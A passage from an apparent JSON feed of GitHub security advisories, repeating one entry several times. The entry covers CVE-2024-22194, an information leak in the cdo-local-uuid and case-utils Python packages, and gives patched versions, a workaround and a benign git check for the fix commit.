href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[case-utils] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[case-utils] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[case-utils] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a 